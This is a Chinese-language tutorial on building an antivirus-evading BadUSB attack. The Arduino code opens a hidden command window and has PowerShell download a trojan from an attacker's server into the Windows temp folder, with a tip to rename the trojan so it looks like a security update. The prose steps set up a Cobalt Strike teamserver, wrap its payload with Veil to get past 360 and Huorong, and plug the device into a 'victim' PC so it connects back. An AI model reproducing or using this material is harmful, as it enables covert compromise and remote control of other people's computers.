0%

'BadUSB免杀'

Usb 板子和软件等准备工作: 见”BadUSB制作”

板子代码(经过测试可过 360 的沙雕变形虫防护,实际上火绒和电脑管家也过了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
void setup() {
Keyboard.begin();//开始键盘通讯
delay(300);//延时
Keyboard.press(KEY_LEFT_GUI);//win 键
delay(500);
Keyboard.press('r');//r 键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); //使用最小化隐藏cmd 窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(200);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object system.net.webclient;");
Keyboard.println("$url='http://47.240.xxx.xxx/susu.exe';"); //xxx 为你服务器 ip,susu 为生成的木马文件(可以把名字命名成什么 360update 之类的)
Keyboard.println("$file = 'c:\\windows\\temp\\susu.exe';"); //下载到目标存放文件的地址
Keyboard.println("$clnt.downloadfile($url,$file);"); //用分段执行绕过进程防护Keyboard.println("c:\\windows\\temp\\hy.exe"); //这里可以自行研究隐藏文件放到D盘,因为C盘可能没权限。思路:可使用attrib +h 1.txt 将文件隐藏
Keyboard.println("exit");//退出当前窗口
delay(3000);
Keyboard.println("exit");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}

void loop() {
// put your main code here, to run repeatedly:


}

CS服务器部署
sudo apt-get install openjdk-8-jdk 先安装 java 环境
将CS复制到VPS启动CS服务器
./teamserver IP password





使用kali的工具veil生成免杀马
进去veil启动./veil.py
使用模式1免杀
使用go语言加密模块,也就是use 17





选择3自定义shellcode代码
最后在这里把CS生成的payload代码复制进去


最后进行命名,底下为木马存放位置
火绒查杀一下

将木马放到服务器上,将文件名重命名为全大写,因为板子的代码问题(必须修改)

服务器自行部署,检测是否可以下载文件

受害者电脑插入badusb(朋友的电脑是360的杀软,没有报毒)

运行成功后,主机自动上线CS